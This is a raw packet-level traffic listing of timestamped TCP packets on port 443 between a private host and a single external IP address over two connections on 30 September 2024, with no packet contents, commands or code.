Sep 30, 2024 14:20:14.630800962 CEST	49737	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:14.630810976 CEST	443	49737	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:15.274019003 CEST	443	49737	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:15.275789022 CEST	49737	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:15.275799036 CEST	443	49737	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:16.541434050 CEST	443	49737	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:16.541501045 CEST	443	49737	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:16.541544914 CEST	443	49737	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:16.541620970 CEST	49737	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:16.541620970 CEST	49737	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:16.541635036 CEST	443	49737	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:16.541702986 CEST	49737	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:16.793720961 CEST	443	49737	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:16.793734074 CEST	443	49737	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:16.793778896 CEST	443	49737	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:16.793800116 CEST	49737	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:16.793811083 CEST	443	49737	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:16.793874979 CEST	49737	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:16.793874979 CEST	49737	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:16.795737982 CEST	443	49737	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:16.795762062 CEST	443	49737	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:16.795851946 CEST	49737	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:16.795852900 CEST	49737	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:16.795859098 CEST	443	49737	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:16.796062946 CEST	49737	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:16.798477888 CEST	443	49737	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:16.798506021 CEST	443	49737	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:16.798542976 CEST	49737	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:16.798548937 CEST	443	49737	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:16.798610926 CEST	49737	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:16.798811913 CEST	443	49737	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:16.798861980 CEST	49737	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:16.798868895 CEST	443	49737	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:16.798901081 CEST	443	49737	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:16.799022913 CEST	49737	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:16.799350977 CEST	49737	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:16.815196037 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:16.815218925 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:16.815373898 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:16.815671921 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:16.815682888 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:17.595666885 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:17.597928047 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:17.597938061 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:17.859086990 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:17.859122038 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:17.859143972 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:17.859257936 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:17.859272003 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:17.859332085 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:17.945544004 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:17.945580006 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:17.945733070 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:17.945744991 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:17.945996046 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:17.947032928 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:17.947053909 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:17.947129965 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:17.947135925 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:17.948688030 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.031635046 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.031665087 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.031759024 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.031769991 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.032741070 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.032767057 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.032845020 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.032851934 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.032895088 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.032905102 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.033792973 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.033813000 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.033895969 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.033901930 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.035262108 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.102225065 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.102250099 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.102312088 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.102319956 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.102354050 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.102834940 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.118211985 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.118233919 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.118324041 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.118330956 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.118726015 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.119302034 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.119322062 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.119386911 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.119391918 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.119402885 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.119565010 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.120081902 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.120102882 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.120187044 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.120187044 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.120192051 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.120328903 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.120933056 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.120953083 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.121006966 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.121011972 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.121048927 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.121048927 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.121864080 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.121889114 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.121946096 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.121952057 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.122015953 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.122565031 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.122585058 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.122647047 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.122647047 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.122653008 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.122740984 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.197514057 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.197547913 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.197623014 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.197628975 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.197664976 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.197690010 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.205732107 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.205753088 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.205868959 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.205873966 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.206315041 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.206338882 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.206469059 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.206469059 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.206475019 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.206526041 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.207236052 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.207253933 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.207325935 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.207331896 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.207896948 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.207921982 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.207971096 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.207977057 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.208019972 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.208019972 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.210551023 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.210571051 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.210639954 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.210645914 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.211057901 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.211088896 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.211154938 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.211154938 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.211160898 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.211786985 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.211806059 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.211853981 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.211859941 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.211909056 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.211909056 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.284457922 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.284481049 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.284538984 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.284548044 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.284606934 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.292267084 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.292287111 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.292386055 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.292392969 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.292404890 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.292959929 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.292983055 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.293040037 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.293045998 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.293076992 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.293090105 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.293551922 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.293576956 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.293674946 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.293674946 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.293682098 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.294251919 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.294271946 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.294322968 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.294328928 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.294368029 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.294377089 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.294974089 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.294996023 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.295072079 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.295072079 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.295078993 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.295620918 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.295644045 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.295711994 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.295711994 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.295717955 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.296452999 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.296477079 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.296525955 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.296531916 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.296565056 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.296565056 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.371241093 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.371269941 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.371488094 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.371499062 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.373687029 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.379065990 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.379086018 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.379188061 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.379194021 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.379802942 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.379826069 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.379888058 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.379888058 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.379895926 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.380523920 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.380542040 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.380583048 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.380589008 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.380645990 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.380645990 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.381253004 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.381273985 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.381334066 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.381334066 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.381339073 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.381401062 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.381403923 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.381414890 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.381445885 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.381448984 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.381481886 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.381486893 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.381514072 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.381583929 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.382272959 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.382291079 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.382369995 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.382378101 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.383179903 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.383203030 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.383274078 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.383274078 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.383280993 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.386137009 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.458245993 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.458271980 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.458384991 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.458394051 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.458477020 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.465913057 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.465934992 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.466017008 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.466022968 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.466798067 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.466830969 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.466875076 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.466882944 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.466926098 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.466926098 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.467508078 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.467525959 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.467593908 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.467600107 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.468099117 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.468121052 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.468156099 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.468162060 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.468214989 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.468214989 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.468863010 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.468883038 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.468919992 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.468924999 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.469005108 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.469384909 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.469407082 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.469440937 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.469440937 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.469448090 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.469481945 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.469506979 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.470227957 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.470252991 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.470302105 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.470302105 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.470308065 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.474128962 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.544965982 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.544987917 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.545098066 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.545114994 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.545672894 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.552845001 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.552865982 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.552953005 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.552958965 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.553026915 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.553211927 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.553620100 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.553642035 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.553700924 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.553705931 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.553751945 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.553751945 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.554344893 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.554364920 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.554428101 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.554433107 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.554472923 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.554522991 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.554985046 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.555005074 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.555084944 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.555084944 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.555090904 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.555334091 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.555655956 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.555679083 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.555731058 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.555736065 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.555802107 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.556232929 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.556257010 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.556324005 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.556329966 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.556366920 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.557089090 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.557106972 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.557152987 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.557161093 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.557203054 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.557241917 CEST	49738	443	192.168.2.6	79.110.49.196
Sep 30, 2024 14:20:18.631855965 CEST	443	49738	79.110.49.196	192.168.2.6
Sep 30, 2024 14:20:18.631879091 CEST	443	49738	79.110.49.196	192.168.2.6
